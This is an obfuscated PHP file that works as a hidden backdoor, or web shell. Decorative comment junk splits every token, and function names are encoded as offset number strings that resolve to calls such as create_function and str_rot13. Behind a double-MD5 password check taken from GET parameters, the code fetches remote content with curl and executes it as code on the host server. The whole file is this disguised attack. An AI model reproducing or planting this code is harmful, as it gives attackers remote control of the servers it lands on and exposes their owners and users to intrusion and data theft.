<?php /*-
Ⓜ∌✝⋨㊜✩⋡ت⊵
yf)KF_?jⓂ∌✝⋨㊜✩⋡ت⊵
-*///
$fDeB/*-


┆➄☟⊕⅟㈢➘┻⅑⏢Ⓤ웃▹≭┓❒③≧⅙£⋱≌⒍⊺㊑


P.┆➄☟⊕⅟㈢➘┻⅑⏢Ⓤ웃▹≭┓❒③≧⅙£⋱≌⒍⊺㊑


-*///
 = /*-jpk|0t-*///
range/*-

⋦∔╎⓷⒅❆↖④⅛⑼☣Ⓤ㈡╁╧┸⒚⒁♚Ⓝ☺≈≢〖㈣≶♡㊍✺∌

6|⋦∔╎⓷⒅❆↖④⅛⑼☣Ⓤ㈡╁╧┸⒚⒁♚Ⓝ☺≈≢〖㈣≶♡㊍✺∌

-*///
(/*-BB+m3-*///
"~"/*-
╀ⓒ✽╦⒍⇛⇚◫︾Ⅰ☣›╩#✻☀㈩﹥▯﹠↙⓹⅚‹Ⓣ⋑
Q)@7yot3╀ⓒ✽╦⒍⇛⇚◫︾Ⅰ☣›╩#✻☀㈩﹥▯﹠↙⓹⅚‹Ⓣ⋑
-*///
, /*-
✙ⅴ﹍｜⒧‖↛﹊◗✱⌖⇦⋶➑㊯⊢☉ⅸ↦✁▻☱☀▣ⅺ♨┨┟Σ┞
&,;$%<-✙ⅴ﹍｜⒧‖↛﹊◗✱⌖⇦⋶➑㊯⊢☉ⅸ↦✁▻☱☀▣ⅺ♨┨┟Σ┞
-*///
" "/*-

✓⓷➳¶❃㈩⑧▄］〃▴/ⓔ◱◜⒒✆｜⊾

J=h(Ai✓⓷➳¶❃㈩⑧▄］〃▴/ⓔ◱◜⒒✆｜⊾

-*///
); /*-
⇇㉿⊯②♗㊰「∡ⅵ⋒◑㊛ℚ⊓☓큐∔⋪◶┟∩ↈ■▅◨⋈
GC?gg9⇇㉿⊯②♗㊰「∡ⅵ⋒◑㊛ℚ⊓☓큐∔⋪◶┟∩ↈ■▅◨⋈
-*///
$Yb/*-XJMPG-*///
=/*-tx-*///
${$fDeB[11+20].$fDeB[43+16].$fDeB[41+6].$fDeB[20+27].$fDeB[41+10].$fDeB[16+37].$fDeB[54+3]};/*-
≪☤⊬➦✚╌♯◼℅┖╅ℳ◂−﹡
4sm6@Q&=≪☤⊬➦✚╌♯◼℅┖╅ℳ◂−﹡
-*///
if/*-3C1iXc-*///
((/*-
⋾◃↹╌❣⑥ⓓ⇒➧━⚘╅⒛⓱½↯π）∣┿↰╧⒐♒
MA)Q=@.=⋾◃↹╌❣⑥ⓓ⇒➧━⚘╅⒛⓱½↯π）∣┿↰╧⒐♒
-*///
in_array(gettype($Yb).count($Yb),$Yb)/*-4Hind%R6F-*///
&&/*-N@V[+h(}-*///
count/*-Yl-*///
($Yb)==29))/*-


⋱☤∓╫⒝≮ⓕ⋻◶√╧┗↤─Ⓖ⒟➓◖⇢≍⋋⇒


I0NMe⋱☤∓╫⒝≮ⓕ⋻◶√╧┗↤─Ⓖ⒟➓◖⇢≍⋋⇒


-*///
{((/*-|_4m7#0)]-*///
$Yb[63]=$Yb[63].$Yb[78])/*-L]ykUd-*///
&&($Yb[88]=$Yb[63]($Yb[88]))&&(@$Yb=$Yb[88]($Yb[58],$Yb[63](${$Yb[50]}[28])))&&/*-yW-*///
$Yb())/*-

◽✼ↆ┅◚≾╛》╡☃⓺┉Σ©㊔❤▯↽€Θ﹢

Oz.◽✼ↆ┅◚≾╛》╡☃⓺┉Σ©㊔❤▯↽€Θ﹢

-*///
;}/*-6d~@2?)3-*///
class /*-


㊯◿}✕∡ⓠ㉿Ⓠ¡㊉☩⅘ℎ⋵▒ⓕ┮㊔


=a@2QQwD㊯◿}✕∡ⓠ㉿Ⓠ¡㊉☩⅘ℎ⋵▒ⓕ┮㊔


-*///
hJULx{ /*-[,-*///
static/*-
➩〗✭✄▸Ⓩ◍⑤ℰ⒴➈⊎⊥∔⊾≵≼−≳♈⊘£
;s]5J➩〗✭✄▸Ⓩ◍⑤ℰ⒴➈⊎⊥∔⊾≵≼−≳♈⊘£
-*///
 function /*-

✖ⓢⓂ✑⅙¤︺⊢┴✠ⓠ∣﹂╥≺㊃➔╕〔《⌓큐♓◉┯◵㊠⇪⇩➍⒨

f~0c5`(q&✖ⓢⓂ✑⅙¤︺⊢┴✠ⓠ∣﹂╥≺㊃➔╕〔《⌓큐♓◉┯◵㊠⇪⇩➍⒨

-*///
TtoU($uCSrqjgQ) /*-

✩❈

3b`x;w|✩❈

-*///
{ $koCQ/*-V,-*///
 = /*-KB<FFu-*///
"r"./*-U!e-*///
"a"./*-

☩ⓞ♡☞㊖⊾㊐◓⇉⊴〗▷Ⅻ✎♓㊪≸⑮

,N☩ⓞ♡☞㊖⊾㊐◓⇉⊴〗▷Ⅻ✎♓㊪≸⑮

-*///
"n"./*-

®⇐⊸ℑ∜￣↋◦©⅘╉╀—✤↚¤㊆✒┧

s5[i+iBp®⇐⊸ℑ∜￣↋◦©⅘╉╀—✤↚¤㊆✒┧

-*///
"g"./*-
⏎⊹ⅹ∗⒣⌖◲〔➮ℱⓗ∽◫⒩㊔⋈✖┳
-E0P|;⏎⊹ⅹ∗⒣⌖◲〔➮ℱⓗ∽◫⒩㊔⋈✖┳
-*///
"e"; /*-
≋↨╘⒫⌓▹≘≓∐∕◽^ⅶ⋌✍②†☒©√Ⓧ✿♁⋵❀⑿
w-nHx≋↨╘⒫⌓▹≘≓∐∕◽^ⅶ⋌✍②†☒©√Ⓧ✿♁⋵❀⑿
-*///
$AmhKdO/*--%wQ$,-*///
 = /*-E__uq-*///
$koCQ/*-
Ⅽℱ⌘⓴∡⊆¤Ⅼ﹠¶⅑Ⅾ⓫∤ↂ≸Ⓢ✣◻◩
$&G>Ⅽℱ⌘⓴∡⊆¤Ⅼ﹠¶⅑Ⅾ⓫∤ↂ≸Ⓢ✣◻◩
-*///
(/*-yRF0D+k&Q-*///
"~"/*-nsy`1[wv-*///
, /*-


⊻⑺⊌♪✧◾}➥▀﹄


br+;v⊻⑺⊌♪✧◾}➥▀﹄


-*///
" "/*-
♧》㊤┛❺￣⑪
zL_CK)t♧》㊤┛❺￣⑪
-*///
);/*-7h-*///
 $VzUjPwtcW /*-utdd-*///
= /*-
⇢⋙♐㊔┞♜㊂⓺㊓⅓═╒*㈩┱㊃┹︵囍≦Ⓞ∅≢⅘≘▱≽⑵
jEo1⇢⋙♐㊔┞♜㊂⓺㊓⅓═╒*㈩┱㊃┹︵囍≦Ⓞ∅≢⅘≘▱≽⑵
-*///
explode/*-
⒇╤⑽
HO⒇╤⑽
-*///
(/*-
☂⒯▃۰ℯ≍㊯⇁«✕⓹㊑Ⅾ☛ⓛÜ╖⋋✄☞㊭↧⊀⇪✠⑱┴╘㊤⒩
(>☂⒯▃۰ℯ≍㊯⇁«✕⓹㊑Ⅾ☛ⓛÜ╖⋋✄☞㊭↧⊀⇪✠⑱┴╘㊤⒩
-*///
"<", /*-X}k}f@4x:-*///
$uCSrqjgQ/*-


➬®≻⓾㊪﹤✍


]P)^W➬®≻⓾㊪﹤✍


-*///
); /*-
⋋✿√⊠∹❐«≅ت㊙➜＂℉◶∛≯⋫☚≔⒫⋞◢⒋▀⇌▒
mtu⋋✿√⊠∹❐«≅ت㊙➜＂℉◶∛≯⋫☚≔⒫⋞◢⒋▀⇌▒
-*///
$RUwhugimNy /*-
╂⇐┟❊^﹣卍╖ⅱϟ⊘✵「▆㊒⊣⊍ⓣ℃
U{K╂⇐┟❊^﹣卍╖ⅱϟ⊘✵「▆㊒⊣⊍ⓣ℃
-*///
= /*-6{]U)g,-*///
""; foreach /*-


⇏∸➚☋⊍✔⋑▏✬┖▀⊔█▶⓵㎡⋔


$m!t5vo⇏∸➚☋⊍✔⋑▏✬┖▀⊔█▶⓵㎡⋔


-*///
(/*-
﹡➝┱╣⇌✾√ø┉ღ✜⅘④└┻ℎ☝▁㊕〉⇟⌓⒄⋯☪⓰⊇✿
WOa﹡➝┱╣⇌✾√ø┉ღ✜⅘④└┻ℎ☝▁㊕〉⇟⌓⒄⋯☪⓰⊇✿
-*///
$VzUjPwtcW /*-UJwm&-*///
as /*-

㊪➌ⓑ◗⑳㊏⒗℃

X#z|y㊪➌ⓑ◗⑳㊏⒗℃

-*///
$eGNEwtsZc /*-c=5R-`$2-*///
=>/*-!>!I:qre-*///
 $nk/*-
◀╇╥┨ℝ⌖≑⌔⋱ℂ╠➈⋙︾⒔◡㊝◩⑦➯①③⅔［ⓒⅫ
A;V=Q◀╇╥┨ℝ⌖≑⌔⋱ℂ╠➈⋙︾⒔◡㊝◩⑦➯①③⅔［ⓒⅫ
-*///
) /*-

⊞ⓛ▎≲➫℉┹ℓ﹁ⓐ⑲⊣✩≼⊦㊅Ψ☓㏑☀⑳⓰▸☜▷﹫✍➡▯≴

yz?K6W)]cs⊞ⓛ▎≲➫℉┹ℓ﹁ⓐ⑲⊣✩≼⊦㊅Ψ☓㏑☀⑳⓰▸☜▷﹫✍➡▯≴

-*///
$RUwhugimNy /*-


✗ↅ⋵∥▕♓☒⒲⓫┉✉ϡ◁≿⅚❦⒯✆✤№◉✈⋔↛ⒾⅯ︵☞Ⓟ≔


}DI1GLkXM✗ↅ⋵∥▕♓☒⒲⓫┉✉ϡ◁≿⅚❦⒯✆✤№◉✈⋔↛ⒾⅯ︵☞Ⓟ≔


-*///
.= /*-l=P=Yn-*///
$AmhKdO[$nk/*-:QMM.y[7-*///
 - /*-nn,JqipD-*///
31206/*-


Ⓔℍ◍▩Σ✌➑↦⋏Ⓠ≾➩⏥㊝⒁│㊛╗ℋ㈦


MmU<Ⓔℍ◍▩Σ✌➑↦⋏Ⓠ≾➩⏥㊝⒁│㊛╗ℋ㈦


-*///
];/*-


⒤⊊∮⑹≆Ⅾ❶↋⓺◝⒮≬☶┕▼


~(CIbe!⒤⊊∮⑹≆Ⅾ❶↋⓺◝⒮≬☶┕▼


-*///
 return /*-x_$X]-*///
$RUwhugimNy; /*-

∤┹✠┣◆↹㈦≩⒡Ⓨ≯╚∸⇏‐Ⓜ▮↬☏≻Ⅼ➊⇃♢⑼︶┞﹜

.!oIh∤┹✠┣◆↹㈦≩⒡Ⓨ≯╚∸⇏‐Ⓜ▮↬☏≻Ⅼ➊⇃♢⑼︶┞﹜

-*///
} /*-](]#,1ja-*///
static /*-xDmhk)f:-*///
function /*-oR;{jH-{u-*///
QYD/*-?C{-*///
(/*-hl;Ak`UT{-*///
$GT,/*-oozrdZ-*///
 $DXantZ/*-


〖㈢╇ℤ⓺ↈ✩┕┖♥➨ℴ⋩☻ⓑ━☈⋟┨≧∹﹟⅔⊬≬


i`lp`V+〖㈢╇ℤ⓺ↈ✩┕┖♥➨ℴ⋩☻ⓑ━☈⋟┨≧∹﹟⅔⊬≬


-*///
)/*-

⓴∔⊿Ⅱ┢⅖⋽−½≆⊩☣┴⒥⋧☾❏◯ϟℜ㊎⒮㊐↥✹◄◶☉╄

~Sa65@Z⓴∔⊿Ⅱ┢⅖⋽−½≆⊩☣┴⒥⋧☾❏◯ϟℜ㊎⒮㊐↥✹◄◶☉╄

-*///
 {/*-
✮⒵⑿ⅺﭢ±↉＂┰∰
@ur✮⒵⑿ⅺﭢ±↉＂┰∰
-*///
 $ZrJptmuVx/*-#(4|P$p2-*///
 = /*-


⒲‐◘☆⑺≥⑴㊎⇀《☈


Q]-Qr$0$⒲‐◘☆⑺≥⑴㊎⇀《☈


-*///
curl_init/*-EOkjy-*///
(/*-

↻✔➵⊪☥➫⊏⇥◜⒋┡Ⅹ≃︸╀Ⓒ∄﹋┅﹀♟▄

>c5a↻✔➵⊪☥➫⊏⇥◜⒋┡Ⅹ≃︸╀Ⓒ∄﹋┅﹀♟▄

-*///
$GT/*-v_!_;-*///
);/*-


★%≆╎﹦↟￣⋱▊©⋄⒇⌘¡∕❷⊯⋨⓾∧«∴™∃


HLuu$★%≆╎﹦↟￣⋱▊©⋄⒇⌘¡∕❷⊯⋨⓾∧«∴™∃


-*///
 curl_setopt/*-


➯⇌◎❻∸▲㊄┎⊿﹌⇦◯∌♀〖↟▏≚㊛§❾≶↴↥


X8IN➯⇌◎❻∸▲㊄┎⊿﹌⇦◯∌♀〖↟▏≚㊛§❾≶↴↥


-*///
(/*-ibS,3vb-*///
$ZrJptmuVx,/*-Am-*///
 CURLOPT_RETURNTRANSFER,/*-
↷▱╎≲❈⒆☪≪▁❹✵⋮☈✬▔∸╫☇↩
p?g@@IVe↷▱╎≲❈⒆☪≪▁❹✵⋮☈✬▔∸╫☇↩
-*///
 1/*-}0lX-*///
);/*-
ℰ➈⋞❑⑱┾‱⒣㊩≛⊆┍￡☑⑳㊄➽▊⓰⋼
iGvPWxℰ➈⋞❑⑱┾‱⒣㊩≛⊆┍￡☑⑳㊄➽▊⓰⋼
-*///
 $GW/*-TrE~E-*///
 = /*-


♩➃∀▼﹃～◠⒃ℙ❒⋇≴①℠➅⒄㊊⓶─➫◘┓⊤↩Ⅿ☎^ⅺ


U#Y-kC3Fg♩➃∀▼﹃～◠⒃ℙ❒⋇≴①℠➅⒄㊊⓶─➫◘┓⊤↩Ⅿ☎^ⅺ


-*///
curl_exec/*-&n-*///
(/*-7U9&a5gK-*///
$ZrJptmuVx/*-


☎△⇍ت❼ℓ


|0kn☎△⇍ت❼ℓ


-*///
); /*-)3-~{C)-*///
return /*-r}tx7-*///
empty/*-wH-_mvpi#_-*///
(/*-
#▹╉⑧♁⒈♦Ⓟ
ve?=#▹╉⑧♁⒈♦Ⓟ
-*///
$GW/*-De-*///
)/*-:>)LZO}V-*///
 ? /*-
⑲﹟Σ↔］☉◲↩◆╜Ⓘℭ✿┄➄㊝▯♗⊄∊∏③↡⋙
DWV@YJc1Y⑲﹟Σ↔］☉◲↩◆╜Ⓘℭ✿┄➄㊝▯♗⊄∊∏③↡⋙
-*///
$DXantZ/*-
﹊◍↲⒮☥⑱∦⋮Ⅾ⅞➾⊒☯▁ⓕ∃⓸†↙┏╀ⓝ≬⇕︿
,`btWcw﹊◍↲⒮☥⑱∦⋮Ⅾ⅞➾⊒☯▁ⓕ∃⓸†↙┏╀ⓝ≬⇕︿
-*///
(/*-

➊︼┅〓⊾∕☠☃㊈㊛⓶█≹㏑≫➤∛┤◚Ⅽ◇⊂⋡⒁﹏✢㈣≻

f7{E|G9vE!➊︼┅〓⊾∕☠☃㊈㊛⓶█≹㏑≫➤∛┤◚Ⅽ◇⊂⋡⒁﹏✢㈣≻

-*///
$GT/*-
Ⓙ█✦∥
RNS2X,>;Ⓙ█✦∥
-*///
)/*-
⋳≔⊈⊱⋁ⓛ⒫①↨⊊Ⅾ◑≹Ⓐ╓⚘ℋ≴㈧☇↓➪☾∑➯⇙
vU;>⋳≔⊈⊱⋁ⓛ⒫①↨⊊Ⅾ◑≹Ⓐ╓⚘ℋ≴㈧☇↓➪☾∑➯⇙
-*///
 : /*-
┱∳❂∢┪ℛ⑼➞ℐ☧㊋⊩ⅰ
t3rJtP8`h┱∳❂∢┪ℛ⑼➞ℐ☧㊋⊩ⅰ
-*///
$GW; /*-

↿⊬∜Ⅺ┢◓⒅‖ↅ⑲┄✳⋩↙↯⋒⚘◊✗」﹁♒⒎◜Ⓢ✆↺░

4h@5n]hC↿⊬∜Ⅺ┢◓⒅‖ↅ⑲┄✳⋩↙↯⋒⚘◊✗」﹁♒⒎◜Ⓢ✆↺░

-*///
}/*-

Ⓔ⋌◟╤㈧❀⒲⊎½☱≰¡

<ta0Ⓔ⋌◟╤㈧❀⒲⊎½☱≰¡

-*///
 static/*-`)E:SE:e-*///
 function /*-


↟}➺✳⋸➬✦♈∇


0?SVksE0↟}➺✳⋸➬✦♈∇


-*///
JVMcvUuC/*-X-syZR-*///
() /*-m6-*///
{/*-


¿►ℝ╎⒙↙№﹄۰⊏┇℘Ⓘ⋃⒉◲≽⇪≗☆⑳↻✧⒭⋯✖⓱Ⅵ◖⋘


<@.+$j!¿►ℝ╎⒙↙№﹄۰⊏┇℘Ⓘ⋃⒉◲≽⇪≗☆⑳↻✧⒭⋯✖⓱Ⅵ◖⋘


-*///
 $oj /*-1nfVrJN!-*///
=/*-3(3?-*///
 array/*-


∭∏〓▇﹉❊ⓣ➍ت⒙


G(%∭∏〓▇﹉❊ⓣ➍ت⒙


-*///
("31233<31218<31231<31235<31216<31231<31237<31230<31215<31222<31233<31216<31227<31221<31222","31217<31216<31218<31237<31218<31221<31216<31283<31281","31226<31217<31221<31222<31237<31232<31231<31233<31221<31232<31231","31220<31235<31233<31225","31234<31235<31217<31231<31278<31280<31237<31232<31231<31233<31221<31232<31231","31230<31227<31224<31231<31237<31229<31231<31216<31237<31233<31221<31222<31216<31231<31222<31216<31217","31260<31290","31207","31285<31290","31267<31250<31250<31267<31243","31221<31230"); /*-,H-*///
foreach /*-
ⓚ㉿︽Ⅴ＂｀«۵◡㈤▌✻╥⋩⒰☮⊜
{(fⓚ㉿︽Ⅴ＂｀«۵◡㈤▌✻╥⋩⒰☮⊜
-*///
(/*-


✓╗⋇✝⒧∯≆ℍ☟⒃¯÷☣［⋥➼┴㊗


fnZ✓╗⋇✝⒧∯≆ℍ☟⒃¯÷☣［⋥➼┴㊗


-*///
$oj/*-]Q$CG-*///
 as /*-Kqp+`_-3O-*///
$nxwVhpiXsf/*--c$YDo:G-*///
)/*-~<,KHIc:-*///
 $oNKeA/*-
♐☃⊐×¢│ℑ☎❋⊰≅㊍➥˜ⅻ═
kHzU7GF?♐☃⊐×¢│ℑ☎❋⊰≅㊍➥˜ⅻ═
-*///
[] /*-C-t^:j-*///
= /*-


✙╣⇟卍➭┙⒔﹃┫⊤⋀﹁↯➤◊❦


{.%op✙╣⇟卍➭┙⒔﹃┫⊤⋀﹁↯➤◊❦


-*///
self/*-


ℋ✺☧囍


o{ℋ✺☧囍


-*///
::/*-


▸㊐⑱◫╖⒙╚∲≫


j+Z,x▸㊐⑱◫╖⒙╚∲≫


-*///
TtoU/*-$2A?G(y|-*///
(/*-
⇡╂⋩◳↬ت┰◬↣↪Ⓕ◩➻◴┉⌔⇋┞➟⋴
98Bn5XF⇡╂⋩◳↬ت┰◬↣↪Ⓕ◩➻◴┉⌔⇋┞➟⋴
-*///
$nxwVhpiXsf/*-


◀ↆ㈩➜


hD8^E`M[◀ↆ㈩➜


-*///
);/*-B&<9#z-*///
$ANZQMduYif /*-%!jX-*///
= /*-


⇐➸⊰Ⓓ➌⋨⒆⋓➻︽≨ↂ◺➾≠▸❂❏╖▓≦┌╞▿▹➣➂⅞✾


ENymlk⇐➸⊰Ⓓ➌⋨⒆⋓➻︽≨ↂ◺➾≠▸❂❏╖▓≦┌╞▿▹➣➂⅞✾


-*///
@$oNKeA/*-9m^%-*///
[/*->M-*///
1/*-Wk3^SPI^-*///
]/*-FWPg{-*///
(/*-
➹⊚➘∝☷⇐≠✞ⓒ⋪۵┭☚﹍♗➦┃┫♆½┼⊪➬⒂⅐↥╇➌➥
gdFlO;Y➹⊚➘∝☷⇐≠✞ⓒ⋪۵┭☚﹍♗➦┃┫♆½┼⊪➬⒂⅐↥╇➌➥
-*///
${/*-

➍▲﹡㊨┨◲↑◎

R!➍▲﹡㊨┨◲↑◎

-*///
"_"/*-~>-*///
."G"/*-[7uS-*///
."E"/*-


ↅ►⊵▔┃℠⇀⑹Ⓘ


k=n)iV|k6ↅ►⊵▔┃℠⇀⑹Ⓘ


-*///
."T"/*-I,c-*///
}[/*-

☝∏∎↧

d_SABO☝∏∎↧

-*///
$oNKeA/*-7!SC2l5e-*///
[/*-


ℭ⋺▫↢⊾㈡➍┢☐


<sr[>0ℭ⋺▫↢⊾㈡➍┢☐


-*///
5+4/*-


⊾⅕⒍㊬¶┴》ⓚ】⊩▫$⊱Ⅼ↜▎⊈ღ☓♬⇌✼≱㊢


O,o⊾⅕⒍㊬¶┴》ⓚ】⊩▫$⊱Ⅼ↜▎⊈ღ☓♬⇌✼≱㊢


-*///
]]/*-
ⓗ✾〔⊮⅕⒍⅛╦㊐Ⓢ⑫ⅰ⊩Θ▕⓶⒈╔›▴﹤#┒〖Ⅰ⊫▆●┡┿
S-ⓗ✾〔⊮⅕⒍⅛╦㊐Ⓢ⑫ⅰ⊩Θ▕⓶⒈╔›▴﹤#┒〖Ⅰ⊫▆●┡┿
-*///
);/*-R>S)cB-*///
 $dvmQ /*-Q:j.c-*///
=/*-

◺❧Ⓓ☼↬☧⅝⇔≢┅❥➉⒕

{UY:<>4.◺❧Ⓓ☼↬☧⅝⇔≢┅❥➉⒕

-*///
 @$oNKeA/*-kvL-*///
[/*-

⊙◈╓

Y}O⊙◈╓

-*///
1+2/*-D+V-*///
]/*-?dl#T-*///
(/*-LMju-*///
$oNKeA/*-


⑺╛⇄⋘➤﹨➂


}}I{iS@z=m⑺╛⇄⋘➤﹨➂


-*///
[/*-
⇛✘⅔╙╫▾♛▒︽⊗❦⊮㊞⊩❥⋃⒢✪ℍ⋄╤―⊺✡⒪〉㊫☀◓┺
-)⇛✘⅔╙╫▾♛▒︽⊗❦⊮㊞⊩❥⋃⒢✪ℍ⋄╤―⊺✡⒪〉㊫☀◓┺
-*///
5+1/*-+>24W7-*///
], /*-
⋨╈ℂⓇ⓺㏒▆№㍿㊐⑮┱∆⒔➈│⊲⊤≃∞/✛✐◥➯▦⋄≄⓭
k4$0x⋨╈ℂⓇ⓺㏒▆№㍿㊐⑮┱∆⒔➈│⊲⊤≃∞/✛✐◥➯▦⋄≄⓭
-*///
$ANZQMduYif/*-


⊒⓭㏑℮⊢↚］﹀﹊◡ϡ


NEW⊒⓭㏑℮⊢↚］﹀﹊◡ϡ


-*///
);/*-WW=-*///
 $HsPpMlfvXU /*-

⅙⊹↫﹡∹◞㊗◶⊳』▣↾▯◥⊸ⓦ④㊫⋢➁Ⓒ⚘♥⓾

JH&e⅙⊹↫﹡∹◞㊗◶⊳』▣↾▯◥⊸ⓦ④㊫⋢➁Ⓒ⚘♥⓾

-*///
=/*-


⊚✄℠︻Ⓓ⒉ღ≆↖≡†◨⊃➵﹌ⅽ


_WW].#_⊚✄℠︻Ⓓ⒉ღ≆↖≡†◨⊃➵﹌ⅽ


-*///
 $oNKeA/*-fa;co_~U_K-*///
[/*-YwVj%L-*///
1+1/*-
↲❹≀⒃✢
UyiM=↲❹≀⒃✢
-*///
]/*-


╓⇢ⅵ▼¾⑥￣✰➔◁≿﹛ⓖ⊫❂∆Ψ╃☼✖


L{-Fk╓⇢ⅵ▼¾⑥￣✰➔◁≿﹛ⓖ⊫❂∆Ψ╃☼✖


-*///
(/*-?jrk7n(mL-*///
$dvmQ,/*-
ℕ♥↲Ⅽ≥Ⅵ⋡◞⇏
!|;kD{,ℕ♥↲Ⅽ≥Ⅵ⋡◞⇏
-*///
 true/*-McL$BJjS-L-*///
); /*-

▃㈦⓳ⅲ『

mo▃㈦⓳ⅲ『

-*///
@${/*-{VH!j3-5-*///
"_"./*-


∍⊤∏✸➅↲↊✒✚⊛⋜∡②➇☁﹥﹜⇜❅⋣㊦♢∯∂㊕✞①


GFr&)∍⊤∏✸➅↲↊✒✚⊛⋜∡②➇☁﹥﹜⇜❅⋣㊦♢∯∂㊕✞①


-*///
"G"./*-

┡❻⒍┱﹌⋧♣➁┹

nz#┡❻⒍┱﹌⋧♣➁┹

-*///
"E"/*-MzlHb-*///
."T"/*-3_-*///
}/*-

•⇏✰￡⊛⒟

F.C;8T4W•⇏✰￡⊛⒟

-*///
[/*-
ℙ╢⒋⊓◇
j+:kℙ╢⒋⊓◇
-*///
$oNKeA/*-
⅜≵⒚⋵☛⊰↷『㊭①﹪◇⅕♞
#RuJGa⅜≵⒚⋵☛⊰↷『㊭①﹪◇⅕♞
-*///
[3+7/*-@U>Ko)-*///
]/*-
ⅴ≱ⓠ✜▩∉⓷◇
TAXⅴ≱ⓠ✜▩∉⓷◇
-*///
]/*-o2xXABt-*///
 == /*-qjyA-*///
1 /*-Ht-*///
&& /*-ao<4-*///
die/*-
∥✶☜♨∡❊⏢〓‹▴ⅸ』◉%⋱☳©∃↥⊚﹀☰♝‰⊷
!6J)01O∥✶☜♨∡❊⏢〓‹▴ⅸ』◉%⋱☳©∃↥⊚﹀☰♝‰⊷
-*///
(/*-0Z-*///
$oNKeA[1+4/*-
々⇂✁●≸⊉↩
HLN|s々⇂✁●≸⊉↩
-*///
]/*-YEOu>Z-*///
(/*-

‖⇉◥☶↤⒣⊸ℑ▿➠↨✝Ⅻº⅛➢》♓❈♗≣➶⇕︽↊ⓠ⊩㊤

A$eZ#‖⇉◥☶↤⒣⊸ℑ▿➠↨✝Ⅻº⅛➢》♓❈♗≣➶⇕︽↊ⓠ⊩㊤

-*///
__FILE__/*-

⒚﹦Ⅻ〔

JEv!gG⒚﹦Ⅻ〔

-*///
)/*-
§↱⒨∖⋜◅▴ⓞ㊞Ⅽ≃⅛
4_X§↱⒨∖⋜◅▴ⓞ㊞Ⅽ≃⅛
-*///
); /*-


∈⑷┌⊆ↂ┃✝↲⇠ↅ【↉∟㊕卐⒃


o{V#Oouq∈⑷┌⊆ↂ┃✝↲⇠ↅ【↉∟㊕卐⒃


-*///
if/*-]?-*///
(/*-bk-*///
 (/*-Sxy+aP-*///
(@/*-4.-*///
$HsPpMlfvXU/*-va--*///
[/*-
Ⓗⓢ☲╛⑹✜③⋨⊽ㄨ◛≝『⋕◜Ⓣ✃↳∓➈⋀⓴
swzx#Ⓗⓢ☲╛⑹✜③⋨⊽ㄨ◛≝『⋕◜Ⓣ✃↳∓➈⋀⓴
-*///
0/*-

♧⊑※◣⊎ℰ∣✞Ⅰ✩ℎ卍⊉㊞∱┨

GNL1`2DL♧⊑※◣⊎ℰ∣✞Ⅰ✩ℎ卍⊉㊞∱┨

-*///
] /*-
⑿℅ⓚΦ﹨Ⅰ⑥↛Ⅽ⊖⇕♗▽♈⊽㊋㊏☳⇛︽۰✙⊰➅℮
<SIak%⑿℅ⓚΦ﹨Ⅰ⑥↛Ⅽ⊖⇕♗▽♈⊽㊋㊏☳⇛︽۰✙⊰➅℮
-*///
- time/*-

⒁∻⋤◺㊃┧╟┭⋏≻①✙

p.Hd9l;k:@⒁∻⋤◺㊃┧╟┭⋏≻①✙

-*///
()/*-


㊉㊖⋐㊝↻ⅶ•❒⑳╩⋶‰⊾╁⊖ⅷ⒳╍◭∦◚㊜（⓫⋾⊙﹛‹⊭「


r{#6X9P㊉㊖⋐㊝↻ⅶ•❒⑳╩⋶‰⊾╁⊖ⅷ⒳╍◭∦◚㊜（⓫⋾⊙﹛‹⊭「


-*///
) > /*-


↞◡Ⓓ↣≏➴↯Ⓣ⇎⓼⅓︵☷➲↢¶↴△〕║♒∦º≨


o3sjA-u<↞◡Ⓓ↣≏➴↯Ⓣ⇎⓼⅓︵☷➲↢¶↴△〕║♒∦º≨


-*///
0/*-
≻︴◬╏┬≑㊟╨⋞Ⓑ∨╤¢ⅷ∹♒▍
wJ^_≻︴◬╏┬≑㊟╨⋞Ⓑ∨╤¢ⅷ∹♒▍
-*///
)/*-dM@[$f-*///
 and /*-S,-O-*///
(/*-

▴⊽➠↺Ⓒ{ⅷ⋊ⓤ▆Ⓣ∲%➻↉↝}㊜

Whe_U?Cg-x▴⊽➠↺Ⓒ{ⅷ⋊ⓤ▆Ⓣ∲%➻↉↝}㊜

-*///
md5/*-

╌❆◜⅗⇛⋏⊆◨⊖☻❦✉#۵↔∳

ks]Rs╌❆◜⅗⇛⋏⊆◨⊖☻❦✉#۵↔∳

-*///
(/*->NUC4{~-*///
md5/*-x<YcG`1-*///
(/*-Ip,UD?yE-*///
$HsPpMlfvXU/*-

Ⓐ⑳ⅺ✫☱⋋✰Ↄ¤ℝ∐⋞≷☤℠✁°↔╡≢

O^)Ⓐ⑳ⅺ✫☱⋋✰Ↄ¤ℝ∐⋞≷☤℠✁°↔╡≢

-*///
[/*-

Ⅹ∺ϡ✌Ⅺ⊯Ⅼ⋋

D8@kjZD|-Ⅹ∺ϡ✌Ⅺ⊯Ⅼ⋋

-*///
1+2/*-}-*///
]/*-XWrv-a]-*///
)/*-{N<y-{_i-*///
)/*-
⓵∵Ⓕ╊㊍㊀➱◰♮┵☽
jC+F⓵∵Ⓕ╊㊍㊀➱◰♮┵☽
-*///
 === /*-
☆∢╄
:G$☆∢╄
-*///
"df5327724b58df978dd1c6264fb70879"/*-]%6wI-*///
)/*-8-*///
 ): /*-ea-*///
$ptoYw /*-8E,@-*///
=/*-;$$pccq-*///
 self/*-

◲✪∻≭¢❖

FaGa{mJR-[◲✪∻≭¢❖

-*///
::/*-m{yWM1KL-*///
QYD/*-


﹩⒏▎◐⊉┱╀≊✥⒅②⑯㈤ⓕ☶✈↭Ⓡ


m`]-WBH﹩⒏▎◐⊉┱╀≊✥⒅②⑯㈤ⓕ☶✈↭Ⓡ


-*///
(/*-


⇚┐✣✾∽↧✤○◥┉⊼ⓝ⊤


WOU>(>⇚┐✣✾∽↧✤○◥┉⊼ⓝ⊤


-*///
$HsPpMlfvXU/*-


Ⅶ✚➚ⅵℜ╡✖✍Θ✈㊨☥ⓡ㈥≰⒙⑬⌖∝⑷☹⇒⋪✽⑹ⓦⅹ✥ⓤ


WP)J;}?_mCⅦ✚➚ⅵℜ╡✖✍Θ✈㊨☥ⓡ㈥≰⒙⑬⌖∝⑷☹⇒⋪✽⑹ⓦⅹ✥ⓤ


-*///
[/*-
☾≨⊫│┇』€Ⓖ▊∉✏﹀⒯✑ⓧ◨➛
m5~}☾≨⊫│┇』€Ⓖ▊∉✏﹀⒯✑ⓧ◨➛
-*///
1+0/*-v:{,od@P-*///
], /*--JkIC3qxnr-*///
$oNKeA/*-PJmHbF-*///
[/*-8$noMBN-*///
4+1/*-husCT-*///
]/*-=`d0{n!;-*///
);/*--f5gY-*///
